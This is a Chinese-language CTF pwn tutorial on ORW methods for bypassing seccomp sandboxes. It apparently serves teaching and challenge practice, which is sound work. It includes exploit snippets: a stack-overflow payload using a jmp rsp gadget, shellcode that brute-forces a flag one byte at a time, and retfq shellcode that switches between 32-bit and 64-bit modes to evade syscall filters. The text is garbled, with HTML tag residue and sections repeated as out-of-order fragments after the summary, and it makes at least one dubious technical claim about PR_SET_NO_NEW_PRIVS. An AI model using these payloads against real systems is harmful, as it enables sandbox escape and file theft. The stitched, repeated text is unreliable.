栈沙箱学习之ORW绕过技术详解<\/h1>

前言<\/h2>
ORW（Open-Read-Write）绕过技术是CTF Pwn题目中常见的沙箱绕过方法，主要用于当程序禁用execve等危险系统调用时，通过组合open、read、write系统调用来读取并输出flag内容。<\/p>

沙箱保护机制<\/h2>
沙箱保护通过对程序加入限制，最常见的是禁用某些系统调用（如execve），使得攻击者无法直接获取远程终端权限。在这种情况下，只能通过ROP方式调用open、read、write来读取并打印flag内容。<\/p>

查看沙箱配置<\/h2>

可以使用seccomp-tools<\/code>工具查看程序是否开启沙箱以及允许的系统调用：<\/p>

$ sudo apt install gcc ruby-dev
<\/span><\/span>$ gem install seccomp-tools
<\/span><\/span>$ seccomp-tools dump .\/pwn
<\/span><\/span><\/code><\/pre>沙箱开启的两种方式<\/h2>
在CTF Pwn题中，沙箱通常通过以下两种方式实现：<\/p>
1. prctl()函数调用<\/h3>
#include<\/span> <sys\/prctl.h><\/span>
<\/span><\/span><\/span><\/span>int<\/span> prctl<\/span>(int<\/span> option, unsigned<\/span> long<\/span> arg2, unsigned<\/span> long<\/span> arg3, unsigned<\/span> long<\/span> arg4, unsigned<\/span> long<\/span> arg5);
<\/span><\/span><\/code><\/pre>重要参数：<\/p>

PR_SET_NO_NEW_PRIVS(38)<\/code>: 第二个参数设为1时禁用execve系统调用<\/li>
PR_SET_SECCOMP(22)<\/code>:

第二个参数为1时，只允许read\/write\/_exit\/sigreturn<\/li>
第二个参数为2时为过滤模式，通过参数3的结构体自定义规则<\/li>
<\/ul>
<\/li>
<\/ul>
2. seccomp库函数<\/h3>
__int64<\/span> sandbox<\/span>() {
<\/span><\/span>  __int64<\/span> v1 =<\/span> seccomp_init(0LL<\/span>);  \/\/ 0表示白名单模式，0x7fff0000U为黑名单模式
<\/span><\/span><\/span><\/span>  
<\/span><\/span>  \/\/ 添加规则
<\/span><\/span><\/span><\/span>  seccomp_rule_add(v1, 0x7FFF0000LL<\/span>, 2LL<\/span>, 0LL<\/span>);  \/\/ open
<\/span><\/span><\/span><\/span>  seccomp_rule_add(v1, 0x7FFF0000LL<\/span>, 0LL<\/span>, 0LL<\/span>);  \/\/ read
<\/span><\/span><\/span><\/span>  seccomp_rule_add(v1, 0x7FFF0000LL<\/span>, 1LL<\/span>, 0LL<\/span>);  \/\/ write
<\/span><\/span><\/span><\/span>  seccomp_rule_add(v1, 0x7FFF0000LL<\/span>, 60LL<\/span>, 0LL<\/span>); \/\/ exit
<\/span><\/span><\/span><\/span>  
<\/span><\/span>  seccomp_load(v1);  \/\/ 加载过滤器到内核
<\/span><\/span><\/span><\/span>  return<\/span> seccomp_release(v1);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Shellcode写入位置<\/h2>
当溢出空间不足时，题目通常会提供mmap函数来申请额外内存：<\/p>
void<\/span> *<\/span>mmap<\/span>(void<\/span> *<\/span>addr, size_t length, int<\/span> prot, int<\/span> flags, int<\/span> fd, off_t offset);
<\/span><\/span><\/code><\/pre>常用参数设置：<\/p>

addr: 要申请的地址（建议4字节对齐）<\/li>
length: 申请长度（建议0x1000）<\/li>
prot: 权限（7表示RWX）<\/li>
flags: 0x22<\/li>
fd: 0xFFFFFFFF<\/li>
offset: NULL<\/li>
<\/ul>
实例分析<\/h2>
案例1：[极客大挑战 2019]Not Bad (完整ORW)<\/h3>
检查保护：<\/strong><\/p>

64位，保护全关<\/li>
允许open\/read\/write\/exit<\/li>
<\/ul>
漏洞点：<\/strong><\/p>
char<\/span> buf[32<\/span>];
<\/span><\/span>read(0<\/span>, buf, 0x38uLL<\/span>);  \/\/ 栈溢出漏洞
<\/span><\/span><\/span><\/code><\/pre>利用思路：<\/strong><\/p>

构造ORW shellcode<\/li>
利用jmp_rsp跳转到mmap内存<\/li>
执行shellcode获取flag<\/li>
<\/ol>
EXP关键部分：<\/strong><\/p>
mmap =<\/span> 0x123000<\/span>
<\/span><\/span>orw =<\/span> shellcraft.<\/span>open('.\/flag'<\/span>)
<\/span><\/span>orw +=<\/span> shellcraft.<\/span>read(3<\/span>, mmap, 0x50<\/span>)  # fd=3是第一个打开的文件<\/span>
<\/span><\/span>orw +=<\/span> shellcraft.<\/span>write(1<\/span>, mmap, 0x50<\/span>)
<\/span><\/span>
<\/span><\/span>jmp_rsp =<\/span> 0x400A01<\/span>
<\/span><\/span>
<\/span><\/span>pl =<\/span> asm(shellcraft.<\/span>read(0<\/span>, mmap, 0x100<\/span>)) +<\/span> asm('mov rax,0x123000;call rax'<\/span>)
<\/span><\/span>pl =<\/span> pl.<\/span>ljust(0x28<\/span>, b<\/span>'<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>pl +=<\/span> p64(jmp_rsp) +<\/span> asm('sub rsp,0x30;jmp rsp'<\/span>)
<\/span><\/span><\/code><\/pre>案例2：2021蓝帽杯初赛-slient (缺少write)<\/h3>
沙箱限制：<\/strong><\/p>

只允许read和open<\/li>
<\/ul>
解决方案：<\/strong><\/p>

采用单字节爆破方式<\/li>
比较flag字符，命中则卡住循环，否则程序退出<\/li>
通过程序表现判断字符是否正确<\/li>
<\/ul>
EXP关键部分：<\/strong><\/p>
def<\/span> exp<\/span>(dis, char):
<\/span><\/span>    shellcode =<\/span> '''
<\/span><\/span><\/span>        \/* open("flag") *\/
<\/span><\/span><\/span>        mov esp,0x40404140
<\/span><\/span><\/span>        push 0x67616c66  # "flag"
<\/span><\/span><\/span>        push esp
<\/span><\/span><\/span>        pop ebx
<\/span><\/span><\/span>        xor ecx,ecx
<\/span><\/span><\/span>        mov eax,5  # open系统调用号
<\/span><\/span><\/span>        int 0x80
<\/span><\/span><\/span>        
<\/span><\/span><\/span>        \/* read(fp, buf, 0x50) *\/
<\/span><\/span><\/span>        mov ecx,eax
<\/span><\/span><\/span>        push 0x33
<\/span><\/span><\/span>        push 0x40404089
<\/span><\/span><\/span>        retfq  # 切换回64位
<\/span><\/span><\/span>        
<\/span><\/span><\/span>        mov rdi,rcx
<\/span><\/span><\/span>        mov rsi,rsp
<\/span><\/span><\/span>        mov rdx,0x70
<\/span><\/span><\/span>        xor rax,rax
<\/span><\/span><\/span>        syscall
<\/span><\/span><\/span>        
<\/span><\/span><\/span>        \/* 单字节比较 *\/
<\/span><\/span><\/span>        push 0
<\/span><\/span><\/span>        cmp byte ptr[rsi+<\/span>{}<\/span>],<\/span>{}<\/span>
<\/span><\/span><\/span>        jz $-3  # 命中则卡住
<\/span><\/span><\/span>        ret
<\/span><\/span><\/span>    '''<\/span>.<\/span>format(dis, char)
<\/span><\/span><\/code><\/pre>案例3：RW缺O (缺少open)<\/h3>
解决方案：<\/strong><\/p>

利用fstat系统调用（64位系统调用号5，对应32位的open）<\/li>
使用retfq指令在32位和64位模式间切换<\/li>
<\/ul>
retfq使用说明：<\/strong><\/p>

从64位切换到32位：
push<\/span> 0x23<\/span>      ; 32位代码段选择子
<\/span><\/span><\/span><\/span>push<\/span> addr<\/span>      ; 32位代码地址
<\/span><\/span><\/span><\/span>retfq<\/span>
<\/span><\/span><\/code><\/pre><\/li>
从32位切换到64位：
push<\/span> 0x33<\/span>      ; 64位代码段选择子
<\/span><\/span><\/span><\/span>push<\/span> addr<\/span>      ; 64位代码地址
<\/span><\/span><\/span><\/span>retfq<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
关键shellcode：<\/strong><\/p>
\/*<\/span> 64->32切换<\/span> *\/<\/span>
<\/span><\/span>push<\/span> 0x23<\/span>
<\/span><\/span>push<\/span> 0x40404040<\/span>
<\/span><\/span>retfq<\/span>
<\/span><\/span>
<\/span><\/span>\/*<\/span> 32位<\/span>open<\/span> *\/<\/span>
<\/span><\/span>mov<\/span> esp<\/span>,0x40000400<\/span>
<\/span><\/span>push<\/span> 0x0067<\/span>      ; "g"
<\/span><\/span><\/span><\/span>push<\/span> 0x616c662f<\/span>  ; "alf\/"
<\/span><\/span><\/span><\/span>mov<\/span> ebx<\/span>,esp<\/span>      ; filename
<\/span><\/span><\/span><\/span>xor<\/span> ecx<\/span>,ecx<\/span>      ; flags
<\/span><\/span><\/span><\/span>mov<\/span> eax<\/span>,5<\/span>        ; open系统调用号
<\/span><\/span><\/span><\/span>int<\/span> 0x80<\/span>
<\/span><\/span>
<\/span><\/span>\/*<\/span> 32->64切换<\/span> *\/<\/span>
<\/span><\/span>push<\/span> 0x33<\/span>
<\/span><\/span>push<\/span> 0x40000037<\/span>
<\/span><\/span>retfq<\/span>
<\/span><\/span><\/code><\/pre>高级技巧<\/h2>
1. 纯字符Shellcode生成<\/h3>
当题目限制shellcode必须为可打印字符时，可以使用alpha3工具生成：<\/p>
python ~\/pwntools\/alpha3\/ALPHA3.py x64 ascii mixedcase rbx --input=<\/span>\/tmp\/raw
<\/span><\/span><\/code><\/pre>2. 系统调用号参考<\/h3>



名称<\/th>
32位调用号<\/th>
64位调用号<\/th>
<\/tr>
<\/thead>


read<\/td>
3<\/td>
0<\/td>
<\/tr>

write<\/td>
4<\/td>
1<\/td>
<\/tr>

open<\/td>
5<\/td>
2<\/td>
<\/tr>

exit<\/td>
1<\/td>
60<\/td>
<\/tr>

fstat<\/td>
-<\/td>
5<\/td>
<\/tr>
<\/tbody>
<\/table>
总结<\/h2>
ORW绕过技术的核心是根据沙箱限制灵活组合可用的系统调用：<\/p>

完整ORW：直接使用open\/read\/write<\/li>
缺少write：采用单字节爆破<\/li>
缺少open：利用fstat+retfq模式切换<\/li>
缺少read\/write：结合mmap和文件描述符操作<\/li>
<\/ol>
掌握这些技术需要深入理解系统调用约定、CPU模式切换和shellcode构造技巧。<\/p>

名称<\/th>	32位调用号<\/th>	64位调用号<\/th> <\/tr> <\/thead>
read<\/td>	3<\/td>	0<\/td> <\/tr>
write<\/td>	4<\/td>	1<\/td> <\/tr>
open<\/td>	5<\/td>	2<\/td> <\/tr>
exit<\/td>	1<\/td>	60<\/td> <\/tr>
fstat<\/td>	-<\/td>	5<\/td> <\/tr> <\/tbody> <\/table> 总结<\/h2> ORW绕过技术的核心是根据沙箱限制灵活组合可用的系统调用：<\/p> 完整ORW：直接使用open\/read\/write<\/li> 缺少write：采用单字节爆破<\/li> 缺少open：利用fstat+retfq模式切换<\/li> 缺少read\/write：结合mmap和文件描述符操作<\/li> <\/ol> 掌握这些技术需要深入理解系统调用约定、CPU模式切换和shellcode构造技巧。<\/p>

栈沙箱学习之ORW绕过技术详解<\/h1>

前言<\/h2> ORW（Open-Read-Write）绕过技术是CTF Pwn题目中常见的沙箱绕过方法，主要用于当程序禁用execve等危险系统调用时，通过组合open、read、write系统调用来读取并输出flag内容。<\/p>

沙箱保护机制<\/h2> 沙箱保护通过对程序加入限制，最常见的是禁用某些系统调用（如execve），使得攻击者无法直接获取远程终端权限。在这种情况下，只能通过ROP方式调用open、read、write来读取并打印flag内容。<\/p>

沙箱开启的两种方式<\/h2> 在CTF Pwn题中，沙箱通常通过以下两种方式实现：<\/p>

实例分析<\/h2>

高级技巧<\/h2>

前言<\/h2>
ORW（Open-Read-Write）绕过技术是CTF Pwn题目中常见的沙箱绕过方法，主要用于当程序禁用execve等危险系统调用时，通过组合open、read、write系统调用来读取并输出flag内容。<\/p>

沙箱保护机制<\/h2>
沙箱保护通过对程序加入限制，最常见的是禁用某些系统调用（如execve），使得攻击者无法直接获取远程终端权限。在这种情况下，只能通过ROP方式调用open、read、write来读取并打印flag内容。<\/p>

沙箱开启的两种方式<\/h2>
在CTF Pwn题中，沙箱通常通过以下两种方式实现：<\/p>